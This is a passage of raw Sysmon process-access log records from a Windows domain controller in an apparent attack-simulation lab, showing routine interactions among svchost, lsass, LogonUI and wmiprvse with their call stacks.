dows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009615Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.248{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009614Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.248{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009613Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.232{08A6967A-4288-6000-0F00-000000009A01}11241288C:\Windows\System32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1ad7|c:\windows\system32\termsrv.dll+6b498|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009612Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.232{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009611Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.232{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009610Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.232{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009609Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.232{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009608Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.217{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009607Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.217{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009606Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.217{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009605Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.217{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009604Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.217{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009603Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.217{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009602Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.217{08A6967A-4288-6000-0F00-000000009A01}11241288C:\Windows\System32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1ad7|c:\windows\system32\termsrv.dll+6b498|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009601Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.217{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009600Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.217{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009599Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.185{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009598Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.185{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009597Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.185{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009596Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.185{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009595Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.185{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009594Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.185{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009593Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.185{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009592Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.185{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009591Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 